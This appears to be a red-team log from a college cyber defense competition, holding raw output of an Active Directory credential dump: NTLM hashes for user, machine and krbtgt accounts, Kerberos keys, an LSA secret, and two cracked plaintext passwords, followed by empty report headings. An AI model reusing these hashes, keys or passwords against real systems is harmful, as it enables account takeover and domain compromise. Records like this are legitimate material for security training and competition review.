0030 B5 28 1D 3D 3B CA 2C D5 13 69 4B AB A4 4C 78 78 .(.=;.,..iK..Lxx
NL$KM:c8ea14883790f7eb52f8c776acda626e454b30a715fd5b26998abfb85f41d51fdbd29854182a8b2fe10fe67a9abb9c0fb5281d3d3bca2cd513694baba44c7878
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2ed14c09e4342b6697ad42b04ed86068:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0ee0a40b55ebe4e13f155429012bf031:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:c82a791957fc5e6fcc4098c0b7b71326:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:6d936490e906ab3cb86cc21f3dd469f2:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:dcd5072de595c8dd679bd68e17f873e9:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:e6b09f8e0e84b89b6d64807c3168f98b:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:bbd782b0452616651c71ca688a2a3e93:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:e87e42c53256b51c248a7d882d0f2cb4:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team22.isucdc.com\greenteamlumi:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\asdasd:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\greenteamtestlum:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\signupyeah:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\sam:1601:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
WIN-1MTF2UIC2KK$:1117:aad3b435b51404eeaad3b435b51404ee:5d58ac87905703ebc819560d292e719c:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:7c37d3f00124afe2a04ec7514a6a2e0e:::
WIN-GVCAVB1E38T$:1119:aad3b435b51404eeaad3b435b51404ee:94e94bc4538134c8b16c5b8774143b01:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:5c9ef24748bfe219de3d8aab01aeb751:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:1c65fdf874751c539e53b4bebcb80c752ac6f02a22d1c4de6cc3d9920283d12e
Administrator:aes128-cts-hmac-sha1-96:bdc8e5c0ba90ae729338b9fa272b6349
Administrator:des-cbc-md5:7aa467326826fbd6
krbtgt:aes256-cts-hmac-sha1-96:77b281a8f7c8f31a453ab56c152e8e1639864c19bb09a7d2922755e744b890a6
krbtgt:aes128-cts-hmac-sha1-96:2339f20224e44ea161da3194e099fa0e
krbtgt:des-cbc-md5:bc9ec4c1a12cdcd3
melissa.robles:aes256-cts-hmac-sha1-96:299785149a23b566022d1f4f3ae5536243149c2108578216b2cd429842c105d1
melissa.robles:aes128-cts-hmac-sha1-96:08298eefef5d30f567ba40fc98baff68
melissa.robles:des-cbc-md5:1a522cf46b43750d
roger.cox:aes256-cts-hmac-sha1-96:fe4a9ca205fcedebc595a3b395e018607a895ae04e7828d34c67d97a9222f3b9
roger.cox:aes128-cts-hmac-sha1-96:2b5385ff35c4614e916b14953b943f89
roger.cox:des-cbc-md5:bc798c892c1f6b43
edward.matthews:aes256-cts-hmac-sha1-96:fa043835d75cba9cf0acc82020bc24f0bba8f5e6f90cd5bf8c07387b86f1e91d
edward.matthews:aes128-cts-hmac-sha1-96:4564a6ebf641cbc0d1a30f0d8337d972
edward.matthews:des-cbc-md5:bfbc150402d93ea4
joy.newman:aes256-cts-hmac-sha1-96:261fc9b5d00ccfc41a7050aed4569c7251a3885d22d726cb4abb014de75df722
joy.newman:aes128-cts-hmac-sha1-96:e0a9652050bfb2125fc7450be8ede1d7
joy.newman:des-cbc-md5:34138a2620cd292f
andrea.hall:aes256-cts-hmac-sha1-96:80680c00cce95bcdfa2714b923679eb1a9b5a38c4a2f9aa0ec52bb2e25f8a217
andrea.hall:aes128-cts-hmac-sha1-96:144c26eb5ae02758f1da642d982cef31
andrea.hall:des-cbc-md5:525e6e3d91522504
geoffrey.mitchell:aes256-cts-hmac-sha1-96:faa4264f340388241b1ec37f5d9b5241179b43be3a7876381ca78d6e8fa2d327
geoffrey.mitchell:aes128-cts-hmac-sha1-96:09624d8f4dc5e1a72239954db57fcbeb
geoffrey.mitchell:des-cbc-md5:6dbfec5bba97543e
joann.wilson:aes256-cts-hmac-sha1-96:026521fe9b4140f4b079531892e6f9fae497bacbe35bea5dd4be01481af6dab1
joann.wilson:aes128-cts-hmac-sha1-96:801dd50d76fbf77ebb589b763428d2e0
joann.wilson:des-cbc-md5:c81c38e3678fdcce
leslie.brady:aes256-cts-hmac-sha1-96:eabea15aaff72286889d2cbd76159627ed17bd9f8030dc22b90b481e0e28af8e
leslie.brady:aes128-cts-hmac-sha1-96:11fc0ce62140bdfba0ca438012d4fbc1
leslie.brady:des-cbc-md5:dfdf29ce7991cd7f
michael.miranda:aes256-cts-hmac-sha1-96:4b83f670976cbf2e7e2a33a46a678e3d525da58d790c0dceb5ef9d1ee07cb32a
michael.miranda:aes128-cts-hmac-sha1-96:22ddf4dccccc6a900eb12685c25811e1
michael.miranda:des-cbc-md5:9ef8b32fd3ce83ad
krystal.gray:aes256-cts-hmac-sha1-96:003d35dcde791b121946534415ecb4db445a333a9f4c5efbe74655a6a46dbed9
krystal.gray:aes128-cts-hmac-sha1-96:facd451e53d3ddfbd60575ad60916cce
krystal.gray:des-cbc-md5:1cd06ea240dc6d51
AD$:aes256-cts-hmac-sha1-96:29c339bc2772e2ee8a74f044b02d7d1bd0b87893c09695c622b68df6ad08ff5f
AD$:aes128-cts-hmac-sha1-96:278dadb28749ae455973d8c7644cb824
AD$:des-cbc-md5:e3106ba7762cf270
WIN-1MTF2UIC2KK$:aes256-cts-hmac-sha1-96:228cb0ac8653998245132acdb48955628373749cc282bd4e2c80e44fade5c2fa
WIN-1MTF2UIC2KK$:aes128-cts-hmac-sha1-96:af648e6463a9efef9753612838d2f19c
WIN-1MTF2UIC2KK$:des-cbc-md5:079489ce0880e96b
MGMT$:aes256-cts-hmac-sha1-96:094f5804e376b81dfb7b884a555343a0503f861c13010d82bb4cc5b31c6c75df
MGMT$:aes128-cts-hmac-sha1-96:95a2f3c3278df3bf7081900069d82814
MGMT$:des-cbc-md5:fd6726071ab026ab
WIN-GVCAVB1E38T$:aes256-cts-hmac-sha1-96:2fc4c6d085269a739bb87c6c635e831b6276efbedf231034cb7bd2e6b26989dc
WIN-GVCAVB1E38T$:aes128-cts-hmac-sha1-96:8b7899e80335dd52037c41f87f48e030
WIN-GVCAVB1E38T$:des-cbc-md5:fb891a5208258a8c
WWW$:aes256-cts-hmac-sha1-96:07c822b72f0e58101bafb60b09ec0f7744f9082a6bb9e568ea01fa2dbcdf5218
WWW$:aes128-cts-hmac-sha1-96:92989e2f776b0980fd18ab23040c3b5a
WWW$:des-cbc-md5:7cad623b3d2f2ada
## NT hashes cracked from Secretsdump
michael.miranda:erikaa
krystal.gray:oggies
Notable Defenses
Add content here...
Team Spirit Issues
Add content here...